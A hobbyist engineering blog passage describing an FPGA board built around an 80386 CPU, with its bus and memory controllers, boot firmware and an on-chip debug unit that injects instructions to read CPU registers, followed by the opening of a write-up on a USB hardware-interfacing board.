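    """Return (byte_address, size_in_bytes) for one bus transfer.

    a23_1 : value of the A[23:1] address lines
    bhe_n : BHE# level (0 = upper byte D[15:8] enabled)
    ble_n : BLE# level (0 = lower byte D[7:0] enabled)
    """
    base = a23_1 << 1                 # A0 is not driven by the CPU
    if not bhe_n and not ble_n:
        return base, 2                # 16-bit word at an even address
    if not ble_n:
        return base, 1                # lower byte only: even address
    if not bhe_n:
        return base + 1, 1            # upper byte only: odd address
    raise ValueError("no byte enable asserted")


print(decode_transfer(0x7FFFF8, 0, 0))  # (16777200, 2), i.e. address 0xFFFFF0
```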

As an example, here is a waveform of bus signals during these operations :

• Idle

Each bus access operates in two steps. The first one, indicated by ADS#, is used to drive the Bus Cycle Definition signals and an address. The second one takes place during the next rising edge of the main clock. Depending on the W/R# pin state, the data bus is driven with the value the CPU wants to write. During all these sequences ADS# is still asserted.

The next bus cycle is performed when the 386 detects a falling edge on the READY# signal. So the bus controller can be easily modeled as the following Finite-State Machine :

It is simple to implement this behavior in Verilog :

```verilog
always @(posedge clk) begin
   if (!_ads) begin
      capture_bus(); // Capture values driven on
                     // A[23:1], D[15:0], /BLE, /BHE, WR, DC and MIO
      _ready <= 1;
      state <= ST_T1;
   end
   else if (state == ST_T1) begin
      _ready <= 0;
      state <= ST_T2;
   end
end
```
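To make the timing easier to follow, the same state machine can be modelled in a few lines of Python. This is only a behavioural sketch: the class name `BusController`, the `IDLE` start state and the `step` method are assumptions made for illustration, and the signals keep the active-low naming of the Verilog above (`_ads`, `_ready`).

```python
from dataclasses import dataclass

ST_IDLE, ST_T1, ST_T2 = "IDLE", "T1", "T2"


@dataclass
class BusController:
    """Hypothetical software model of the two-step bus controller."""
    state: str = ST_IDLE
    _ready: int = 1  # active low: 1 means READY# is deasserted

    def step(self, _ads: int) -> None:
        """Apply one rising clock edge, given the sampled ADS# level."""
        if not _ads:
            # ADS# asserted: a new bus cycle starts, READY# is released
            self._ready = 1
            self.state = ST_T1
        elif self.state == ST_T1:
            # Second step: acknowledge the transfer
            self._ready = 0
            self.state = ST_T2


# Replay a short ADS# sequence: idle, bus cycle start, then two more edges
bc = BusController()
trace = []
for ads in (1, 0, 1, 1):
    bc.step(ads)
    trace.append((bc.state, bc._ready))
```

The trace shows READY# going low exactly one clock edge after the cycle has been captured, which is the acknowledge the 386 waits for.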

As the data bus is bidirectional, it is sometimes necessary to set it to high impedance in order to let another device drive the bus. The byte lanes requested by the CPU via BHE# and BLE# must also be respected.

```verilog
assign d[15:8] = wr || _bhe || !ramcs ? 8'hzz : dout[15:8];
assign d[7:0] = wr || _ble || !ramcs ? 8'hzz : dout[7:0];
```
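The condition used by these two assignments can be checked with a tiny truth-table helper. This is a sketch only: `driven_lanes` is a hypothetical name, and the arguments simply mirror the `wr`, `_bhe`, `_ble` and `ramcs` signals of the Verilog above.

```python
from typing import Tuple


def driven_lanes(wr: int, _bhe: int, _ble: int, ramcs: int) -> Tuple[bool, bool]:
    """Return (high_lane_driven, low_lane_driven) for D[15:8] and D[7:0].

    A lane is left in high impedance when the CPU is writing (wr),
    when the lane is not requested (_bhe / _ble are active low),
    or when the internal RAM is not selected (ramcs == 0).
    """
    high = not (wr or _bhe or not ramcs)
    low = not (wr or _ble or not ramcs)
    return high, low


# 16-bit read from the internal RAM: both lanes are driven
word_read = driven_lanes(wr=0, _bhe=0, _ble=0, ramcs=1)
# Byte read on the low lane only
low_byte_read = driven_lanes(wr=0, _bhe=1, _ble=0, ramcs=1)
```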

### Memory Controller

Once the bus protocol is properly respected, the address requested by the CPU must be decoded in order to figure out which device must be selected. This is the purpose of the memory controller unit.

Altera Cyclone IV devices feature embedded memory structures. They consist of M9K memory blocks that can be configured to provide various memory functions, such as RAM, shift registers or ROM. The idea here is to use them to create a small memory initialized with a basic piece of code dedicated to CPU initialization. Another useful feature of this memory is that it can easily be read and edited through JTAG using the In-System Memory Content Editor provided by Quartus II.

Basically, the main address space is composed of two memories : an external (i.e. the SRAM) and an internal (i.e. the M9K blocks).

The first megabyte of addressable memory is organized like the layout of the traditional IBM PC. This means that only the first 640KB of external memory are mapped, from 0x000000 to 0x0A0000, and the BIOS shadow ROM (implemented here with internal memory) is mapped from 0x0F8000 to 0x100000. The shadow ROM was originally a 64KB memory containing a copy of the BIOS ROM mapped on the last 64KB of the address space. As the CPU starts fetching instructions at 0xFFFFF0 after a reset, the mechanism consists of mapping a ROM at this address, copying the ROM content to the shadow ROM and then jumping to a subroutine located in the first megabyte.

Here, the internal RAM is only 32KB due to the FPGA limitations and is located at both 0xFF8000 and 0x0F8000, which allows simulation of the original machinery. Moreover, the whole SRAM is mapped from 1MB, which means that the first 640KB of external RAM are mapped twice.

Memory controller unit can be simplified as :

The actual address space layout is achieved by applying a logic expression to the chip select signal of each memory. Notice that the WE# signal of the SRAM is not active on the same level as the W/R# signal of the 386, so this signal is inverted by the FPGA.

```verilog
assign eramwe = !wr;
assign eramcs = !(cs && ((addr[23:16] < 8'h0A) ||
                         (addr[23:20] == 4'h1)));
assign iramcs = cs && ((addr[23:15] == 9'h1FF) ||
                       (addr[23:15] == 9'h01F));
```
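The resulting memory map can be explored with a small Python transcription of these expressions. It is a sketch under assumptions: `decode` is a hypothetical helper, polarities are ignored (it only reports which memory is selected), and the internal memory is given priority in the returned label although the Verilog above never selects both at once.

```python
def decode(addr: int, cs: bool = True) -> str:
    """Return which memory a 24-bit physical address selects."""
    a23_16 = (addr >> 16) & 0xFF
    a23_20 = (addr >> 20) & 0xF
    a23_15 = (addr >> 15) & 0x1FF

    # External SRAM: first 640KB, plus the whole second megabyte
    eram = cs and (a23_16 < 0x0A or a23_20 == 0x1)
    # Internal M9K memory: last 32KB of the address space and its shadow
    iram = cs and a23_15 in (0x1FF, 0x01F)

    if iram:
        return "internal"
    if eram:
        return "external"
    return "none"


reset_vector = decode(0xFFFFF0)   # where the 386 fetches after reset
shadow_start = decode(0x0F8000)   # shadow copy in the first megabyte
video_hole = decode(0x0A0000)     # just above the first 640KB
```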

### Skeleton of a basic firmware

As an example, this section will present a basic firmware which can be run on the LSE-PC.

Firstly, it is considered here that the entire firmware will be located on the internal memory which is automatically initialized when the design is loaded into the FPGA.

On reset, the 80386 CPU runs in real mode and starts executing the instructions located at the end of the address space: 0xFFFFF0. The purpose of these instructions is to jump to the first megabyte by reloading the Code Segment. However, the last 16 bytes can also be used to set up a minimal environment allowing 16-bit application execution. The following code is an example of 5 instructions that fit in these 16 bytes. It basically sets the Data, Stack and Code Segment selectors, sets the stack pointer and then jumps to the beginning of the internal RAM, mapped at offset 0x8000 of segment 0xF000.

```nasm
org 0xFFF0 ;; CS:0xF000, IP:0xFFF0
reset:
        mov ax, 0xF000
        mov ds, ax
        mov ss, ax
        mov sp, 0xFFF0
        jmp 0xF000:0x8000
```
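The addresses involved in this reset sequence can be double-checked with a little arithmetic. The sketch below assumes the usual 386 behaviour where the hidden CS base is 0xFFFF0000 right after reset, and masks addresses to the 24 bits exposed by the 386SX; `real_mode_phys` is a hypothetical helper name.

```python
ADDR_MASK = 0xFFFFFF        # the 386SX only exposes 24 address bits
RESET_CS_BASE = 0xFFFF0000  # hidden CS base right after reset (assumed)
RESET_IP = 0xFFF0


def real_mode_phys(segment: int, offset: int) -> int:
    """Real-mode translation: segment * 16 + offset, seen on the bus."""
    return ((segment << 4) + offset) & ADDR_MASK


# First fetch after reset, as seen on A[23:0]
reset_fetch = (RESET_CS_BASE + RESET_IP) & ADDR_MASK

# Target of "jmp 0xF000:0x8000" and initial stack top (SS:SP)
after_jump = real_mode_phys(0xF000, 0x8000)
stack_top = real_mode_phys(0xF000, 0xFFF0)
```

With these values, the far jump lands at 0x0F8000, which is the shadow mapping of the internal memory.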

Now that the execution flow has exited the reset state, it is possible to switch the CPU to protected mode. This can be achieved by loading a simple Global Descriptor Table which defines the memory segments that will be used in protected mode. Notice that the jump to reload_segs is used to flush the instruction prefetch queue after enabling protected mode in order to validate segment reloading. This code can be improved by setting an Interrupt Descriptor Table in addition to the Global Descriptor Table.

```nasm
org 0x8000
startup:
        lgdt [gdtr]     ;; Load Global Descriptor Table

        mov eax, cr0    ;; Enable protected mode
        or eax, 1
        mov cr0, eax

        jmp reload_segs ;; Flush prefetch queue

reload_segs:
        mov ax, 0x10    ;; Reload segment selectors
        mov ds, ax
        mov es, ax
        mov fs, ax
        mov gs, ax
        mov ss, ax

        ;; ljmp 0x08:0xF8400
        dw 0xEA66       ;; Reload CS and jump to application code
        dd 0xF8400
        dw 0x08

align 16
gdt:
        ...
gdtr:
Limit   dw gdtr - gdt - 1
Base    dd 0xF0000 + gdt
```

A 32-bit application can then be located at 0xF8400. The internal RAM is segmented according to the following layout :

As the In-System Memory Content Editor accepts a special text format called MIF (Memory Initialization File), a dedicated OCaml script has been created to facilitate the linking of several raw binary object files.

```sh
bin2mif -o fw.mif -b 0xF8000 0 \ # Memory base address
        -i pm.bin 0xF8000 0 \    # Jump to protected mode code
        -i app.bin 0xFC000 0 \   # Application code
        -i reset.bin 0xFFFF0 0   # Reset routine code
```
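The original tool is written in OCaml and is not reproduced here. As an illustration of what such a linker has to do, here is a minimal Python sketch that places raw blobs at their addresses and emits a byte-wide MIF. The function name `build_mif`, the 8-bit word width and the zero fill are assumptions, not a description of the real `bin2mif`.

```python
def build_mif(base: int, size: int, blobs) -> str:
    """Lay out (address, bytes) pairs in a zero-filled image, return MIF text."""
    image = bytearray(size)
    for addr, data in blobs:
        start = addr - base
        if start < 0 or start + len(data) > size:
            raise ValueError(f"blob at {addr:#x} does not fit in the image")
        image[start:start + len(data)] = data

    lines = [
        f"DEPTH = {size};",       # number of words
        "WIDTH = 8;",             # bits per word (assumed byte-wide)
        "ADDRESS_RADIX = HEX;",
        "DATA_RADIX = HEX;",
        "CONTENT BEGIN",
    ]
    lines += [f"{i:X} : {b:02X};" for i, b in enumerate(image)]
    lines.append("END;")
    return "\n".join(lines) + "\n"


# Example: a 32KB image based at 0xF8000 holding the first reset
# instruction (B8 00 F0 encodes "mov ax, 0xF000") at 0xFFFF0
mif = build_mif(0xF8000, 0x8000, [(0xFFFF0, bytes([0xB8, 0x00, 0xF0]))])
```

Keeping the layout step separate from the text generation makes it easy to reject blobs that fall outside the 32KB of internal memory.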

## Providing debug facilities

Even though Altera's FPGAs provide an efficient internal signal analyser thanks to SignalTap, debugging software becomes a real pain when the size of the applications running on the 386 becomes significant. Adding a flexible on-chip debug facility based on UART communication to this design is one of the main challenges of this project.

### Supervisor

The supervisor is designed using Altera's QSys tool, which assists the creation of systems based on the NIOS II soft-processor. This system is composed of a private on-chip memory, which contains NIOS instructions and data, and of a UART connected to an FT230X chip.

The protocol between the host and the supervisor is pretty simple and it considers that the CPU is at any time in one of these states :

• STOP : CPU is stopped. RESET signal is asserted.
• RUN : CPU is running.
• IORD / IOWR : CPU is trying to perform an access to IO ports. Distinction between read and write operation is done. Those states are used to allow device emulation.
• BRK16 / BRK32 : CPU is ready to accept debug operations. Distinction between real and protected mode is done.

It is more convenient to implement the protocol logic in NIOS software than to have it hardwired in Verilog. However, directly handling 386 signals on the NIOS is inefficient due to the execution speed of this system. The idea here is to delegate the 386 signal handling job to another module dedicated to it : the On-Chip Debug Unit.

The OCD Unit can take control of the 386 buses at any time by asserting the ocd.en signal, which disables the original bus controller described before. The communication between those two units is ensured by a dual-port shared memory accessible through the Avalon bus and by two PIO registers. The first one, OCD_CTL, is used to reset the OCD Unit from the supervisor. The second one, OCD_STATUS, indicates whether the unit is running or not. The shared memory contains the routine that must be applied to the 386.

### On-Chip Debug Unit

This unit is basically a processor specially designed to handle 386 signals. It fetches its instructions from the 256 x 16-bit Avalon memory filled by the supervisor and operates on a 16 x 16-bit data space also located on shared memory.

While the supervisor can access the OCD program and data without restriction, the OCD Unit can only operate on its data space, which corresponds to offset 0x100 from the supervisor's point of view. In the dedicated assembler, data memory is addressed using the R1 to R15 naming convention.

```verilog
module ocd
  (
   // OCD Control
   input rst,       // Connected to OCD_CTL
   input clk,       // 40MHz clock (synchronous with 20MHz CPU clock)
   output reg en,   // Asserted if OCD Unit is attached to the 386
   output reg stop, // Connected to OCD_STATUS

   // 80386 signals
   ...
   // RAM signals (Avalon)
   ...
   );
```

Implementing this kind of processor is quite simple and a basic one will be based on the following state machine :

As Avalon memory signals are always latched, reading from this memory takes two clock cycles : the first cycle is used to latch the address value and the second one latches the result on the data bus. Taking that into account, execution of a single instruction which reads and writes data memory cannot take less than five clock cycles.

• FETCH : Get instruction from program memory.
• EXEC : Load source value from data memory and execute the instruction.
• STORE : Store result and compute next address of the next instruction.
• LATCH : Latch instruction address into program memory.

Instruction set is composed of several categories. The first one is used to control the OCD :

• ATTACH/DETACH : Connect/Disconnect the OCD unit to 386 signals.

The second category includes instructions related to 386 signals processing :

• LDD d : Load data bus value into d register.
• LDAL d / LDAH d : Load address bus value into d register.
• LDWR d : Load W/R# signal into d register.
• LDDC d : Load D/C# signal into d register.
• LDMIO d : Load M/IO# signal into d register.
• STD s : Set data bus value to s register value.
• START/RESET : Start/Reset the CPU.
• READY : Assert READY# signal.

Of course, some instructions only operate on registers :

• LDI d, imm16 : Load a 16-bit immediate into d register.
• MOV d, s : Move s register value into d register.
• CLR d : Clear d register.

The third category is about flow control. As the data memory only exposes one port to the OCD Unit, implementing a compare instruction which loads two registers is not possible in a single cycle. So a compare register has been added to the core. All comparisons are made against that register.

• LDCMP s : Load s register value into the compare register.
• CMP s : Compare s register value with compare register value and store the result into the compare register.
• BA/BEQ/BNE addr : Branch to the specified address according to compare register value.

As an example, these instructions perform a jump to label if R1 is equal to R2 :

```asm
LDCMP R1  ;; cmpr <- R1
CMP R2    ;; cmpr <- cmpr == R2
BEQ label ;; pc <- label if cmpr != 0
```
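The role of the compare register can be illustrated with a short Python model of these three instructions. The class `CompareCore` and its method names are hypothetical. `BEQ` follows the comment above (taken when the compare register is non-zero), while `BNE` is assumed to be its exact opposite.

```python
class CompareCore:
    """Toy model of the OCD compare register (not the real core)."""

    def __init__(self, regs):
        self.regs = dict(regs)  # data space, e.g. {"R1": 5, "R2": 5}
        self.cmpr = 0           # the single compare register

    def ldcmp(self, s):
        """LDCMP s: cmpr <- s"""
        self.cmpr = self.regs[s]

    def cmp(self, s):
        """CMP s: cmpr <- (cmpr == s), stored as 1 or 0"""
        self.cmpr = int(self.cmpr == self.regs[s])

    def beq_taken(self):
        """BEQ: branch if cmpr != 0"""
        return self.cmpr != 0

    def bne_taken(self):
        """BNE: assumed to branch if cmpr == 0"""
        return self.cmpr == 0


def jumps_if_equal(r1, r2):
    """Run LDCMP R1; CMP R2; BEQ and report whether the branch is taken."""
    core = CompareCore({"R1": r1, "R2": r2})
    core.ldcmp("R1")
    core.cmp("R2")
    return core.beq_taken()
```

Each instruction touches at most one data register, which is what the single memory port requires.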

Some instructions can stay more than one cycle in the EXEC state in order to wait for an acknowledge from the CPU during some bus operations :

• HOLD : Assert HOLD signal and wait for HOLDA signal.
• INT : Assert INT signal and wait for INTA signal.
• EXIT : Stop OCD routine execution. Never leaves EXEC state and assert ocd.stop signal.

This wait state mechanism is also used to implement instructions used to wait for a particular event on the bus. All those instructions deassert READY# signal and attach the OCD to the 386 when the expected condition is triggered.

• WAITADS : Wait for ADS# signal to be asserted
• WAITIO : Wait for ADS# and M/IO# getting low
• WAITLOCK : Wait for ADS# and LOCK# to be asserted

The block diagram of this unit can be represented as :

Here are the routines used to reset and start the CPU from the OCD Unit. Notice that the start routine lets the original bus controller operate on the 386 until an IO access is performed. The supervisor just has to be interrupted when the OCD exits the start routine in order to handle the IO request. Devices can then be emulated by the supervisor or by the host.

```asm
.func ocd_prgm_reset
        RESET   ;; RESET <- 1
        EXIT

.func ocd_prgm_start
        START   ;; RESET <- 0
        DETACH  ;; Let the bus controller handle CPU signals
        WAITIO  ;; Wait for IO access to attach OCD Unit
        LDAL R1 ;; Get IO port address
        LDWR R2 ;; Get IO operation type
        EXIT
```

### Example : Obtaining CPU registers

Now that the OCD Unit internals have been presented, the purpose now is to use it to get CPU registers.

Before applying debug operations to the CPU, it is necessary to stop execution and put it in a known state. The simplest method to interrupt a 386 without having to care about the interrupt flag is to send a Non Maskable Interrupt. Unlike the INTR signal, the NMI mechanism does not provide any acknowledge from the CPU. So the only way to know whether the CPU actually took the NMI into account is to wait for the assertion of the LOCK# signal. Indeed, the 386 locks the whole bus when it accesses an IDT or IVT entry. The WAITLOCK instruction has been designed for that specific purpose.

```asm
.func ocd_prgm_break
        NMI      ;; Set NMI signal
        WAITLOCK ;; Wait for ADS# and LOCK# signals then attach OCD unit
```

In the next step, the behaviour of the CPU differs according to its mode. If the 386 is still in real mode, it will fetch the code segment and the offset of the NMI handler from the Interrupt Vector Table. As the IVT always starts at 0x0000000, the address 0x0000008 will be output after triggering the NMI.

On the other hand, if protected mode is enabled, the CPU will fetch the Interrupt Descriptor corresponding to the NMI. This structure is located in the Interrupt Descriptor Table, which can be found anywhere in the address space.

As the processor mode is unknown at that moment, it can be deduced from the first requested address after NMI :

```asm
;; Get CPU Mode
LDAL R2                  ;; Load requested address
LDAH R3
LDCMP R2
LDI R1, 0x0008
CMP R1
BNE break_protected_mode ;; Branch to protected mode handler if
                         ;; A[15:0] != 0x0008
LDCMP R3
BEQ break_real_mode      ;; Branch to real mode handler if
                         ;; A[23:16] is equal to the NMI entry
                         ;; offset on the IVT
```
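The same decision can be written down on the host side in a few lines of Python. This is a sketch of the heuristic only: the helper names are hypothetical, and it assumes that a protected-mode IDT is never laid out so that the NMI descriptor read starts at physical address 0x000008.

```python
NMI_VECTOR = 2       # the NMI is interrupt number 2
IVT_ENTRY_SIZE = 4   # a real-mode vector is 4 bytes (offset, segment)


def split_address(addr: int):
    """Mimic LDAL / LDAH: return (A[15:0], A[23:16])."""
    return addr & 0xFFFF, (addr >> 16) & 0xFF


def cpu_mode(first_locked_address: int) -> str:
    """Guess the CPU mode from the first address requested after the NMI."""
    low, high = split_address(first_locked_address)
    expected = NMI_VECTOR * IVT_ENTRY_SIZE  # 0x0008 in the IVT
    if low == expected and high == 0:
        return "real"
    return "protected"
```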

Only protected mode will be considered for the rest of the example.

As IDT set by the application cannot be trusted, using the OCD Unit to drive a valid interrupt gate is conceivable :

```asm
;; Fake IDT entry
LDI R1, 0b1000111000000000 ;; Flags
STD R1
WAITADS
LDI R1, 0x000D ;; Offset[31:16]
STD R1
WAITADS
LDI R1, 0x0000 ;; Offset[15:0]
STD R1
WAITADS
LDI R1, 0x0008 ;; Segment Selector
STD R1
WAITADS
```
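To see what this fake gate tells the CPU, the four words can be decoded following the standard 386 interrupt gate layout. The function name and the returned dictionary are illustrative assumptions. The arguments are given in the order in which the routine above drives them.

```python
def decode_interrupt_gate(flags, offset_hi, offset_lo, selector):
    """Decode the four 16-bit words of a 386 gate descriptor."""
    attr = flags >> 8  # upper byte: P, DPL, S and type bits
    return {
        "present": bool(attr & 0x80),
        "dpl": (attr >> 5) & 0x3,
        "gate_type": attr & 0xF,          # 0xE = 32-bit interrupt gate
        "offset": (offset_hi << 16) | offset_lo,
        "gdt_index": selector >> 3,       # selector without RPL / TI bits
    }


gate = decode_interrupt_gate(0b1000111000000000, 0x000D, 0x0000, 0x0008)
```

The decoded gate is a present, ring 0, 32-bit interrupt gate pointing to offset 0x000D0000 in the segment described by GDT entry 1.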

A code segment reload is always performed before jumping to the interrupt handler. So a read to a GDT entry will be requested by the CPU.

In the same way, it is painless with this mechanism to drive a valid code segment :

```asm
;; Fake GDT entry
LDI R1, 0b1001101000000000 ;; Flags | Base[23:16]
STD R1
WAITADS
LDI R1, 0x00CF ;; Base[31:24] | G | D/B | Limit[19:16]
STD R1
WAITADS
LDI R1, 0xFFFF ;; Limit[15:00]
STD R1
WAITADS
LDI R1, 0x0000 ;; Base[15:0]
STD R1
WAITADS
READY          ;; GDT Access bit
WAITADS
```
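Decoding these four words with the standard 386 segment descriptor layout shows which segment is being faked. As before, this is a hedged sketch: `decode_segment` is a hypothetical helper, and its arguments follow the order in which the words are driven above.

```python
def decode_segment(flags_base, hi, limit_lo, base_lo):
    """Decode the four 16-bit words of a 386 segment descriptor."""
    access = flags_base >> 8  # P, DPL, S, type
    base = ((hi >> 8) << 24) | ((flags_base & 0xFF) << 16) | base_lo
    limit = ((hi & 0xF) << 16) | limit_lo
    granular = bool(hi & 0x80)  # G bit: limit counted in 4KB pages
    return {
        "base": base,
        "size": (limit + 1) * (4096 if granular else 1),
        "present": bool(access & 0x80),
        "dpl": (access >> 5) & 0x3,
        "executable": bool(access & 0x08),
        "default_32bit": bool(hi & 0x40),  # D/B bit
    }


seg = decode_segment(0b1001101000000000, 0x00CF, 0xFFFF, 0x0000)
```

In other words, the OCD Unit hands the CPU a flat, ring 0, 32-bit code segment covering the whole 4GB address space.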

Finally, as the EFLAGS, EIP and CS registers have been modified, they are pushed on the stack. However, the bus controller is disconnected from the CPU signals : this means that no actual write to memory is performed during this operation. Instead, it is straightforward to load those values into OCD registers :

```asm
;; Context saving
LDD R2 ;; EFLAGS[15:0]
READY
WAITADS
LDD R3 ;; EFLAGS[31:16]
READY
WAITADS
LDD R4 ;; CS
READY
WAITADS
LDD R5 ;; EIP[15:0]
READY
WAITADS
LDD R6 ;; EIP[31:16]
READY
```

Afterwards, the CPU will try to fetch instructions from the interrupt handler. So HOLD signal is asserted at the end of the break routine. This leaves the supervisor time to load the next routine to the OCD program memory.

At this point, the 386 is in a known and valid state, which allows us to inject any instruction sequence. In order to obtain the CPU registers, the pusha instruction can be injected :

```asm
.func ocd_prgm_get_regs
        LDI R1, 0x9060
        LDI R2, 0x9090

        WAITADS ;; Fill instruction prefetch queue
        STD R1  ;; Drive PUSHA; NOP
        WAITADS
        STD R2  ;; Drive NOP; NOP
        WAITADS
        STD R2  ;; Drive NOP; NOP
        WAITADS
        STD R2  ;; Drive NOP; NOP
        WAITADS
        STD R2  ;; Drive NOP; NOP
        WAITADS

        ;; PUSHA
        LDD R0
        READY
        WAITADS
        ...
        LDD R15
        READY

        HOLD    ;; Hold CPU in order to avoid instruction fetch during
                ;; loading of the next OCD routine
        EXIT
```
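On the supervisor or host side, the sixteen captured words then have to be reassembled into eight 32-bit registers. The sketch below assumes that the words land in R0 to R15 in push order (EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI for a 32-bit pusha) and that each register arrives low word first, as EFLAGS and EIP do during context saving. Neither point is confirmed by the routine above, and `decode_pushad` is a hypothetical helper.

```python
PUSHAD_ORDER = ("EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI")

# 0x9060 on the 16-bit bus is the byte sequence 60 90: PUSHA then NOP
injected = (0x9060).to_bytes(2, "little")


def decode_pushad(words):
    """Rebuild 32-bit registers from 16 captured words (R0..R15)."""
    if len(words) != 2 * len(PUSHAD_ORDER):
        raise ValueError("expected 16 captured words")
    regs = {}
    for i, name in enumerate(PUSHAD_ORDER):
        low, high = words[2 * i], words[2 * i + 1]  # assumed word order
        regs[name] = (high << 16) | low
    return regs


# Synthetic capture, for illustration only
sample = [0xBBAA, 0x1100, 0xFFEE, 0x9988, 0x7766, 0xDDCC, 0x000F, 0x5544,
          0x000C, 0xFFE4, 0x0123, 0x0000, 0x89AB, 0x4567, 0x9090, 0xCDEF]
regs = decode_pushad(sample)
```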

However, the pusha instruction modifies the ESP value. In the same way, a mov instruction can be injected to restore ESP and to set any register value.

When the debugging phase is over, a continue routine is executed, which basically injects an iret and drives the original values of EIP, CS and EFLAGS.

For now, the debug unit is provided with a command-line interface allowing simple CPU interactions. When more debug features become available, the goal is to embed a gdb stub into the host application.

```
[lsepc-monitor] start
[lsepc-monitor] status
CPU Status: RUN
[lsepc-monitor] break
[lsepc-monitor] status
CPU Status: Break (Protected Mode)
[lsepc-monitor] getregs
EFLAGS: 00000046
EIP: 000fd024
ESP: ffe4000c
EBP: 00000123
EAX: 1100bbaa
EBX: 5544000f
ECX: 9988ffee
EDX: ddcc7766
ESI: 456789ab
EDI: cdef9090
CS: 0008
[lsepc-monitor] continue
[lsepc-monitor] status
CPU Status: RUN
```

## Conclusion

Developing and testing on the LSE-PC is still mainly based on the JTAG interface. When connected to a JTAG interface, the FPGA design exposes the following entry points :

• RAM/ROM editor : used to perform on-chip operation on the internal memory
• NIOS II interface : used to program and debug the NIOS II contained on the supervisor
• Serial Flash Loader : used to program the SPI flash which contains FPGA configuration
• SignalTap : used to perform signal analysis.

This board is still a proof of concept. However, building it was an excellent exercise to understand how the original 80386 CPU works under the hood.

Although some work still needs to be done to get a truly useful on-chip debugger, the hardware part and the simple embedded chipset are reliable enough to allow the execution of simple applications.

• # One Device to drive them all

Written by Pierre Surply
2016-10-24 15:50:00

## Prologue

Three Devices for logic analysis of passively captured traces,
Seven for inter-chip communication driven by hardwired interfaces,
Nine for in-circuit debugging limited to specific purpose,
One for complex hardware hacking scenarios.

Three tinkerers took those words as they are. Overwhelmed by the complexity implied by the multiplicity of inefficient tools, they thought that the time had come to tackle this problem from another angle.

All they needed was a simple way to manipulate the exotic devices that they required for their projects. Manufactured by foreign organizations, the devices referred to here were designed to fulfill a predefined purpose and were intended to be used as black boxes. Without any knowledge of the internal mechanisms involved in their operation, it was conceivable to integrate them only if they were placed in the kind of environment they were intended for.

But those tinkerers thought differently. Their situation was mostly complicated by the fact that they had already acquired a good control of their personal computers, which they considered their main and perfect workstations. With this setup well defined and roughly understood, they were too stubborn to learn another way to work, as they unanimously decided that this method was the most effective and compliant with the rest of their work.

So instead of reworking their methodology, they agreed that defining a third device, whose only purpose was to handle the interfacing between the workstation and the device under test, was inescapable. The first member of the group asked the others what options were available to fill this position.

The second one said that he already made intensive use of the Arduino for that. Providing easy access to and control of its GPIO and some hardwired bus controllers, it was suitable for the simplest cases.

The third one discussed the merits of the Bus Pirate from Dangerous Prototypes. Mature and widely used, this tool provided direct control of its interfaces via USB without the need to develop a specific firmware.

The first one replied that these proposals had a common issue: they simply communicated with the host through a USB-to-UART translation running at 115200 baud. For him, this prohibited fine-grained configuration and wasted the full capacity provided by the USB protocol.

They all agreed on this last point and started to work on a first prototype of their response to this situation.

It was based on an STM32F072 microcontroller and mapped SPI, I2C, UART and CAN signals to physical headers. As this chip was able to drive USB signals, a mini-USB connector was directly connected to it.

Concerning the software side, one interesting idea here was to expose the hardware interfaces using the corresponding subsystem in the Linux kernel. Even though these subsystems were mostly used to describe on-chip interfaces, adapting them to wrap up the USB functions was feasible. For instance, the SPI exposed by the device could be manipulated as a regular spidev.

Although the concept of such a board was appealing at the time, limitations quickly appeared. First of all, most of the USB protocol had to be implemented in software on the STM32F072, which led to a significant overhead on each USB transaction. Secondly, fully implementing the host driver in kernel space implied a rigid configuration and was error-prone if not done correctly. Finally, the global stability of the STM32F072 MCU was quite poor, especially during a development phase where on-chip debugging had to be frequently used.

One year passed and no one was actually enthusiastic about using this stillborn project in a real context. The first one, whose credibility was at its lowest point, found the courage to propose to the two others that they rethink the project from the beginning. And they accepted, against all odds.

This write-up must be considered as the collection of thoughts that led them to the design and the manufacture of a second version of this small, unpretentious, and unfinished electronic board.

## Chapter I: Forging the One Device

The first step for them was to clearly define how and what could make the second version of the board better than the previous one. The main issue was related to the lack of flexibility of the design and they wondered how they could handle a protocol not supported by the microcontroller they used.

Then they decided to take a look at the wide range of Programmable Logic Devices available nowadays. For a first prototype, a CPLD appeared to be the best choice for such an application. Compared to a regular FPGA, these non-volatile PLDs were cheaper and required a much simpler configuration circuit. They also thought that the prototype was only designed to prove a concept and that moving to a more powerful FPGA for later versions was conceivable.

### Section I: From Ink...

From a high-level point of view, the board had been specified to expose a reasonable number of IOs directly connected to a controller, here an Altera Max V CPLD. As the flaky soft USB implementation of the previous version was quite inconvenient to maintain and to keep reliable, the job here had been assigned to a well-known and solid dedicated USB controller: the FX2LP from Cypress Semiconductor. This highly integrated USB 2.0 microcontroller implemented most of the protocol logic in silicon and only burdened its integrated 8051's firmware with the high-level configuration aspect of USB.

And then came the question of the communication between the USB controller and the IO controller. The FX2LP embedded a powerful mechanism to forward the content of a USB endpoint to a hardware FIFO without any interaction with the internal 8051. The words of these endpoint buffers could then be dequeued by an external component using a hardware interface.

However, this interface was defined by a 16-bit data bus and 6 control signals, which was quite pin-consuming for the CPLD they chose. Fortunately, another mechanism offered by the FX2LP allowed the programming of a custom protocol to transmit and receive these data with the external world: the General Programmable Interface (GPIF). As for the regular FIFO interface, this hardware unit was almost completely independent from the 8051. The firmware was only responsible for programming the hardware state machines used to represent the waveforms of a one-word transmission.

In their case, they chose to allocate 8 wires for the bidirectional data bus, 3 control signals driven by the USB controller and 2 'ready' signals initiated by the IO controller. At that point, none of them had actually thought about the exact shape of the waveforms and the purpose of the control signals but planned to consider that once the first board would be fully manufactured.

The USB device interface was composed of 3 endpoints. Endpoint 0 acted as a regular control endpoint and was used to transfer small requests. Meanwhile, endpoints 2 and 6 were dedicated to bulk transmissions and receptions respectively. The last two were directly connected to the internal FIFO while the first one was completely handled by the 8051.

To power these components, the 5V supplied by USB was first stepped down to 3.3V using a low-dropout voltage regulator to power the USB controller and the IO banks of the CPLD, while a 1.8V regulator powered the CPLD's internal logic.

The main clock was managed by the FX2LP. Connected to a 24MHz crystal, the internal PLL was configured by the 8051 firmware, allowing a CPU clock frequency of 48MHz, 24MHz or 12MHz. As the output of the phase-locked loop was also exposed outside the USB controller by the CLKOUT pin, the CPLD used it as a system clock.

The GPIF unit had a dedicated clock that could be fed internally or imposed by an external device. All operations on this interface were aligned to this signal. To avoid dealing with multiple clock domains in the CPLD, they arranged to drive the IFCLK signal from the IO controller at half the frequency of the system clock.

